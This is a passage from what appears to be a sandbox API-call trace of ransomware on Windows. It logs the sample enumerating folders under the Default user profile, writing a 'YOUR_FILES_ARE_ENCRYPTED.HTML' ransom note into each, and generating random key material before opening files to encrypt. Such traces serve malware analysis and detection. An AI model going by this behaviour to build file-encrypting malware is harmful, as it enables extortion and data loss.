lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media" [0170.988] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\*" [0170.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.989] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.989] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="12.0", cAlternateFileName="")) returned 1 [0170.989] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned 63 [0170.989] GetProcessHeap () returned 0x270000 [0170.989] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.990] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0" [0170.990] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*" [0170.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.990] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.990] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1f2, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.DTD", cAlternateFileName="")) returned 1 [0170.990] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 75 [0170.990] lstrcmpW (lpString1="WMSDKNS.DTD", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.991] PathFindExtensionW (pszPath="WMSDKNS.DTD") returned=".DTD" [0170.991] lstrlenW (lpString=".DTD") returned 4 [0170.991] PathFindExtensionW (pszPath="WMSDKNS.DTD") returned=".DTD" [0170.991] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8928a632, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x27cf, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.XML", cAlternateFileName="")) returned 1 [0170.991] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 75 [0170.991] lstrcmpW (lpString1="WMSDKNS.XML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.991] PathFindExtensionW (pszPath="WMSDKNS.XML") returned=".XML" [0170.991] lstrlenW (lpString=".XML") returned 4 [0170.991] PathFindExtensionW (pszPath="WMSDKNS.XML") returned=".XML" [0170.991] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8928a632, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x27cf, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.XML", cAlternateFileName="")) returned 0 [0170.991] FindClose (in: hFindFile=0x42f3240 | out: 
hFindFile=0x42f3240) returned 1 [0170.991] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0170.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0170.992] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.995] CloseHandle (hObject=0x58c) returned 1 [0170.995] GetProcessHeap () returned 0x270000 [0170.995] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.995] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="12.0", cAlternateFileName="")) returned 0 [0170.995] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.996] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0170.996] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.996] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.999] CloseHandle (hObject=0x5fc) returned 1 [0170.999] GetProcessHeap () returned 0x270000 [0171.000] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.000] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0171.000] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned 60 [0171.000] GetProcessHeap () returned 0x270000 [0171.000] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.000] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar" [0171.000] 
lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*" [0171.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.001] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.001] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0171.001] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned 68 [0171.001] GetProcessHeap () returned 0x270000 [0171.001] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0171.001] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0171.001] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*" [0171.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0171.001] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 
[0171.001] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.001] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0171.002] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0171.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0171.002] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0171.005] CloseHandle (hObject=0x58c) returned 1 [0171.005] GetProcessHeap () returned 0x270000 [0171.006] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0171.006] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0x0, dwReserved1=0x60, cFileName="Settings.ini", cAlternateFileName="")) returned 1 [0171.006] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 73 [0171.006] lstrcmpW (lpString1="Settings.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.006] PathFindExtensionW (pszPath="Settings.ini") returned=".ini" [0171.006] lstrlenW (lpString=".ini") returned 4 [0171.006] PathFindExtensionW (pszPath="Settings.ini") returned=".ini" [0171.006] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0x0, dwReserved1=0x60, cFileName="Settings.ini", cAlternateFileName="")) returned 0 [0171.006] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.006] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0171.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.007] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, 
nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.010] CloseHandle (hObject=0x5fc) returned 1 [0171.010] GetProcessHeap () returned 0x270000 [0171.011] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.011] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0171.011] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0171.011] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0171.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600 [0171.011] WriteFile (in: hFile=0x600, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0171.014] CloseHandle (hObject=0x600) returned 1 [0171.014] GetProcessHeap () returned 0x270000 [0171.015] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: 
hHeap=0x270000) returned 1 [0171.016] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd22ac5d0, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 1 [0171.016] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp") returned 39 [0171.016] GetProcessHeap () returned 0x270000 [0171.016] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0171.016] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp" [0171.016] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*" [0171.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd22ac5d0, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0171.017] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd22ac5d0, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0171.017] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x921a91fa, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0171.017] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 62 [0171.017] lstrcmpW (lpString1="FXSAPIDebugLogFile.txt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.017] PathFindExtensionW (pszPath="FXSAPIDebugLogFile.txt") returned=".txt" [0171.017] lstrlenW (lpString=".txt") returned 4 [0171.017] PathFindExtensionW (pszPath="FXSAPIDebugLogFile.txt") returned=".txt" [0171.017] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0171.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5fc [0171.018] 
